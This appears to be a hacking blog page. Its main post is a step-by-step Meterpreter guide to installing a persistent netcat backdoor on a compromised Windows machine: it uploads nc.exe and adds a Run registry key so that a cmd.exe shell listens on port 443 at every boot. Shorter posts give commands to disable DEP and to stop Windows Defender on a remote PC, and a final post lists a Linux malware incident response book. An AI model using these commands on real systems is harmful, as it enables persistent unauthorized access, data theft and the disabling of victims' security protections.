How to Install Netcat Backdoor on a Remote Machine Using Metasploit

When an attacker successfully compromise a system they need to maintain the connection, that's why the attacker usually installing backdoor on victim computer for future use to make attacker easily connect to victim computer to use victim resource, and collecting data on victim computer.

1 - we must upload netcat to the remote system.
Command :
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

2 - now we edit in registry to have netcat execute on start up and listen on port 443
Command :
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

3 - add our NetCat into start up process
Command :
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

4 - To check our backdoor in autorun process or not
Command :
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

VIDEO :

How to stop Date Execution Prevention Service(DEP) using Metasploit in Windows

Data Execution Prevention (DEP) is a security feature that can help prevent damage to your computer from viruses and other security threats. Harmful programs can try to attack Windows by attempting to run (also known as execute) code from system memory locations reserved for Windows and other authorized programs. These types of attacks can harm your programs and files.

DEP can help protect your computer by monitoring your programs to make sure that they use system memory safely. If DEP notices a program on your computer using memory incorrectly, it closes the program and notifies you.

Command : bcdedit.exe /set {current} nx AlwaysOff

How to Stop Windows Defender Service in remote pc using Metasploit

When Windows Defender is on, you're notified when spyware or other potentially unwanted software tries to install itself or run on your computer. If you use the default settings, Windows Defender also checks for new definitions (files that are used to determine if software is spyware) and automatically removes any detected item that has a recommended removal action.

Command : net stop WinDefend

Linux Malware Incident Response

Linux Malware Incident Response: A Practitioner's Guide to Forensic Collection and Examination of Volatile Data: An Excerpt from Malware Forensic Field Guide for Linux Systems

Book Details:
Pages: 134
Publisher: Syngress (March 2013)
Language: English
ISBN-10: 0124095070
ISBN-13: 978-0124095076
Format: PDF, EPUB

Book Description:
Linux Malware Incident Response is a first look at the Malware Forensics Field Guide for Linux Systems, exhibiting the first steps in investigating Linux-based incidents. The Syngress Digital Forensics Field Guides series includes companions for any digital and computer forensic investigator and analyst. Each book is a toolkit with checklists for specific tasks, case studies of difficult situations, and expert analyst tips. This compendium of tools for computer forensics analysts and investigators is presented in a succinct outline format with cross-references to supplemental appendices. It is designed to provide the digital investigator clear and concise guidance in an easily accessible format for responding to an incident or conducting analysis in a lab.

• Presented in a succinct outline format with cross-references to included supplemental components and appendices
• Covers volatile data collection methodology as well as non-volatile data collection from a live Linux system
• Addresses malware artifact discovery and extraction from a live Linux system

Table of Contents
Chapter 1. Linux Malware Incident Response

Appendix A. Linux Field Guide Tool Box
Appendix B. Selected Readings
Appendix C. Interview Questions
Appendix D. Pitfalls to Avoid
Appendix E. Live Response Field Notes

Download : Linux Malware Incident Response